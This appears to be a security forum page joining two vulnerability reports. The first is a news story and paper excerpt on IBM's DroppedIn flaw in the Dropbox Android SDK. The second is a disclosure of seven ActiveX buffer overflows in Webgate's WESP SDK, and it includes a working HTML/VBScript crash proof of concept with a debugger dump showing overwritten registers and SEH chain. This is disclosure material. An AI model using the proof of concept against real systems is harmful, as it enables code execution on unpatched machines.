Search the Community

Security researchers at IBM have uncovered a bug in cloud storage service provider Dropbox's software development kit (SDK) that potentially leaves millions of Android users open to attack. Researchers at IBM's X-Force Application Security Research warned that the 'DroppedIn' flaw affects many applications using the Dropbox SDK. "It allows attackers to connect applications on mobile devices to a Dropbox account they control," explained vice president of IBM Security Caleb Barlow. "This vulnerability may affect any Android app that uses the Dropbox SDK versions 1.5.4 to 1.6.1, and can be exploited locally using malware and remotely using drive-by techniques." A Dropbox spokesperson told V3 the firm issued an update fixing the flaw in December 2014 and added it could only be exploited in "very specific circumstances" on devices where the main Dropbox Android app was not installed. Barlow said despite the assurances hackers could still steal data from vulnerable systems without the patch. "The vulnerability allows attackers to execute malicious code during the log-in process that allows them to access the random number, called a 'nonce', that Dropbox uses as part of the authentication process," he said. "Once the attacker has the nonce, they can enter an access token that is also used to identify a user and then upload or download files into/from the victim's vulnerable app to the attacker's Dropbox account." He added to fully fix the problem application developers will have to install the SDK patch. "There are many apps that rely on the Dropbox SDK, including Yahoo Mail, Microsoft Office Mobile, AgileBits 1Password, and several productivity, photo editing/sharing tools," he said. "Application developers that use the Android Dropbox SDK need to upgrade their version to at least 1.6.2 or above ASAP which is where the patch for this vulnerability exists." The Dropbox spokesperson moved to allay these concerns telling V3 "most Android app developers using our SDK have updated their apps so users don't need to do anything." The news follows reports that application developers are failing to install critical security updates. Researchers at McAfee reported in February that a number of "popular" applications still do not include critical patches for the high-profile BERserk and Heartbleed Secure Sockets Layer flaws. Source

1 Introduction The Dropbox SDK is a library that developers can download and add to their products. This library provides easy access to Dropbox features, such as downloading and uploading files, via a simple set of APIs. AppBrain provides statistics as to the prevalence of the use of the Dropbox SDK on Android [1]. According to these statistics, 0.31% of all applications use the Dropbox SDK. Of the top 500 apps in the Google Play Store, 1.41% use the Dropbox SDK. Interestingly, 1.32% of total app installations and 3.93% of app installations of the top 500 apps use the Dropbox SDK, respectively. While it is not a highly prevalent library, some extremely popular Android apps that may hold sensitive information use the Dropbox SDK, including Microsoft Office Mobile with over 10,000,000 downloads1 and AgileBits 1Password with over 100,000 downloads2 . The vulnerability that we discovered may affect any Android app that uses the Dropbox SDK versions 1.5.4-1.6.1. We examined 41 apps that use the Dropbox SDK for Android, out of which 31 apps (76%) were vulnerable to our attack (i.e. they used version 1.5.4-1.6.1). It’s noteworthy that the rest of the apps were vulnerable to a much simpler attack with the same consequences, but had been fixed by Dropbox with the 1.5.4 version of the SDK which they did not care to upgrade to. This paper is organized as follows. Section 2 gives a background on Inter-App Communication (IAC) in Android. Section 3 shows how IAC can be exploited in general locally by malware and remotely using driveby techniques. Section 4 describes how the Dropbox SDK for Android uses OAuth for app authorization. In 1https://play.google.com/store/apps/details?id=com.microsoft.office.officehub 2https://play.google.com/store/apps/details?id=com.agilebits.onepassword 1section 5 we deep-dive into the vulnerability we found within the Dropbox SDK for Android OAuth code. Section 6 presents a real attack, dubbed DroppedIn, that exploits the vulnerability. In section 7, we show that the threat is real by presenting case studies. We end with section 8 that presents a mitigation for the vulnerability. 2 Inter-App Communication (IAC) in Android Android applications are executed in a sandbox environment. The sandbox ensures data confidentiality and integrity as no application can access sensitive information held by another application without proper privileges. For example, Android’s stock browser application holds sensitive information such as cookies, cache and history which shouldn’t be accessed by third-party apps. The sandbox relies on several techniques including per-package Linux user-id assignment. Thus, resources, such as files, owned by one app cannot be accessed by default by other apps. While sandboxing is great for security, it may diminish interoperability as apps sometimes would like to talk to each other. Going back to the browser example, the browser would want to invoke the Google Play app when a user browsed to the Google Play website. In order to support this kind of functionality, Android provides high-level Inter-App Communication (IAC) mechanisms. This communication is usually done using special messages called Intents, which hold both the payload and the target application component. Intents can be sent explicitly, where the target application component is specified, or implicitly, where the target is left unspecified and is determined by Android according to other Intent parameters such as its URI scheme, action or category. 3 General Exploitation via Inter-App Communication The attack surface is greatly increased if the attacker can directly invoke application components, controlling the Intent’s payload. This is the case with exported application components. Such components can be attacked locally by malware. Activities, Android application components responsible for UI screens, can also be attacked remotely using drive-by exploitation techniques as shown by [2, 3]. In the local attack, illustrated by Figure 3.1, malware invokes the exported target application component with a malicious Intent (i.e. one that contains malicious data) by simply calling APIs such as Context.startActivity(Intent). In the case of remote drive-by exploitation, illustrated by Figure 3.2, a user is lured into browsing a malicious website. This site serves a web page that causes the browser to invoke the target activity with the malicious Intent. Read more: http://dl.packetstormsecurity.net/1503-exploits/exploiting-dropboxsdk-android.pdf

Webgate technology is focused on digital image processing, embedded system design and networking to produce embedded O/S and web server cameras providing real time images. We are also making superior network stand-alone DVRs by applying our accumulated network and video solution knowledge. WEBGATE Embedded Standard Protocol (WESP) SDK supports same tools in both network DVR and network camera. Webgate Inc. Business Partners: Honeywell, Samsung Techwin, Bosch, Pentax Technology, Fujitsu AOS Technology, inc http://www.webgateinc.com/wgi/eng/#2 http://www.webgateinc.com/wgi_htdocs/eng/sdk_info.html Vulnerability 1: WESP SDK WESPMONITORLib.WESPMonitorCtrl ActiveX LoadImage Buffer Overflow Vulnerability 2: WESP SDK WESPCONFIGLib.UserItem ActiveX ChangePassword Buffer Overflow Vulnerability 3: WESP SDK WESPMONITORLib.WESPMonitorCtrl ActiveX LoadImageEx Buffer Overflow Vulnerability 4: WESP SDK WESPSERIALPORTLib.WESPSerialPortCtrl ActiveX Connect Buffer Overflow Vulnerabilit 5: WESP SDK WESPCONFIGLib.IDList ActiveX AddID Buffer Overflow Vulnerability 6: WESP SDK WESPPLAYBACKLib.WESPPlaybackCtrl ActiveX Connect Buffer Overflow Vulnerability 7: WESP SDK WESPPLAYBACKLib.WESPPlaybackCtrl ActiveX ConnectEx3 Buffer Overflow CompanyName WebgateInc FileDescription WESPConfig Module FileVersion 1, 6, 42, 0 InternalName WESPConfig LegalCopyright Copyright (C) 2004-2010 OriginalFileName WESPConfig.DLL ProductName WESPConfig Module ProductVersion 1, 6, 42, 0 ******************PoC for one of the above Vulnerabilities*********** <html> <object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='target'> </object> <!-- targetFile = "C:\Windows\System32\WESPSDK\WESPPlayback.dll" prototype = "Sub ConnectEx3 ( ByVal bDvrs As Integer , ByVal Address As String , ByVal Port As Integer , ByVal UserID As String , ByVal Password As String , ByVal extcompany As Long , ByVal authType As Long , ByVal AdditionalCode As String )" memberName = "ConnectEx3" progid = "WESPPLAYBACKLib.WESPPlaybackCtrl" argCount = 8 --> <script language='vbscript'> arg1=1 arg2=String(1044, "A") arg3=1 arg4="defaultV" arg5="defaultV" arg6=1 arg7=1 arg8="defaultV" target.ConnectEx3 arg1 ,arg2 ,arg3 ,arg4 ,arg5 ,arg6 ,arg7 ,arg8 </script> </html> ****************************** Stack trace for above PoC Exception Code: ACCESS_VIOLATION Disasm: 76ACD33D MOV CX,[EAX] Seh Chain: -------------------------------------------------- 1 41414141 Called From Returns To -------------------------------------------------- msvcrt.76ACD33D WESPPlayback.999539 WESPPlayback.999539 41414141 41414141 22E5E0 22E5E0 2F712C 2F712C 41414141 41414141 41414141 41414141 41414141 41414141 41414141 Registers: -------------------------------------------------- EIP 76ACD33D EAX 41414141 EBX 039E0040 -> 009DF298 ECX E0551782 EDX 41414141 EDI 76AD4137 -> 8B55FF8B ESI 76ACD335 -> 8B55FF8B EBP 0022E56C -> 039E0020 ESP 0022E56C -> 039E0020 Block Disassembly: -------------------------------------------------- 76ACD333 NOP 76ACD334 NOP 76ACD335 MOV EDI,EDI 76ACD337 PUSH EBP 76ACD338 MOV EBP,ESP 76ACD33A MOV EAX,[EBP+8] 76ACD33D MOV CX,[EAX] <--- CRASH 76ACD340 INC EAX 76ACD341 INC EAX 76ACD342 TEST CX,CX 76ACD345 JNZ SHORT 76ACD33D 76ACD347 SUB EAX,[EBP+8] 76ACD34A SAR EAX,1 76ACD34C DEC EAX 76ACD34D POP EBP ArgDump: -------------------------------------------------- EBP+8 41414141 EBP+12 0022E5E0 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA EBP+16 002F712C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA EBP+20 00000829 EBP+24 002F712C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA EBP+28 0022E6D4 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Stack Dump: -------------------------------------------------- 22E56C 20 00 9E 03 39 95 99 00 41 41 41 41 E0 E5 22 00 [................] 22E57C 2C 71 2F 00 29 08 00 00 2C 71 2F 00 D4 E6 22 00 [.q.......q......] 22E58C B4 6F 2F 00 A0 E6 22 00 98 F2 9D 00 00 00 00 00 [.o..............] 22E59C B0 BA 2E 00 00 00 00 00 00 00 00 00 00 00 00 00 [................] 22E5AC 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [................] P.S. CERT tried to coordinate with the vendor for fixing the issues but there wasn't any response from vendor Best Regards, Praveen Darshanam Source